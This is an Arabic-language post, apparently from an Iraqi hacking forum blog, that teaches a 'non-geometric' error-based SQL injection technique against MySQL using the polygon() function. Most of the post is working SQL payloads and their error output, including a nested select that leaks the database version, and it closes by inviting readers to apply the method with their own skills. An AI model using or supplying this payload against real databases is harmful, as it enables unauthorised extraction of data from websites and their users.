استغلال جديد لحقن Error Based Injection مهم جدا #sql #inject

↑ Grab this Headline Animator

Follow @KAMINDOZ Tweet to @KAMINDOZ

بسم الله الرحمن الرحيم

من المحتمل ان يكون سمع بعضكم عن وجود هذا النوع الجديد من ثغرات ال Error Based Injection و ربما لم يسمع البعض الاخر

لذالك بعد ان درست تلك الطريقه جيدا استطيع ان اقدمها لكم

النوع الجديد من اكتشاف :
spari

قام بنشر النوع الجديد :
صديقى benzi

تاريخ النشر على حد علمى :

10-05-2014, 01:10 AM


اسم النوع الجديد من ثغرات حقن قواعد البيانات Error based injection :

non-geometric error based

نبدأ بسم الله

هذه النوعيه الجديده معتمده على الداله polygon() هذه الداله تعمل انشئت من مجموعات هندسيه بأختصار طبعا

ما اللذى يجعلها معرضه للاستغلال كاثغره ؟!

الاجابه ان تلك الفانكشن/الوظيفه تعمل فقط مع الفانكشن/الوظيفه point()

مثال :

كود PHP:

 SELECT polygon(point(20,10)); 

اذا قمنا بأستخدام تلك ال query سوف نجد مجموعه كبيره من ????s' و ما الى ذالك من اشياء غير مفهومه

للاشخاص اللذين يعرفو بعض من الهندسه تلك ال query تحدد point(x,y)z

الان لنرى ما سيحدث اذا لم نستخدم الفانكشن point()

كود PHP:

SELECT polygon(20,10); 

هذا ما سوف يحدث

كود PHP:

Error 1367(22007):Illegal non geomatric '20' value found during parsing 

جميل حصلنا على خطأ فى ال x

حسنا لنفكر الان قليلا نحن وضعنا string input و عاد لنا الخطأ String output ما اللذى سيحدث اذا استخدمنا Query مثل هذه

كود PHP:

SELECT polygon((select*from(select*from(select@@version)f)x)); 

لنرى ما سيحدث

كود PHP:

Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing 

هاهو معنا اصدار قاعده البيانات
5.5.38-35.2

جميل اعتقد الموضوع اصبح مفهوم حاليا و يمكن تطبيقه بأستخدام باقى خبراتكم

منتديات الهكر العراقي , منظمة الاختراق العراقية kamindoz

Share

Tweet

روابط هذه التدوينة قابلة للنسخ واللصق
URL
HTML
BBCode

Tweet Follow @KAMINDOZ Tweet

kamindoz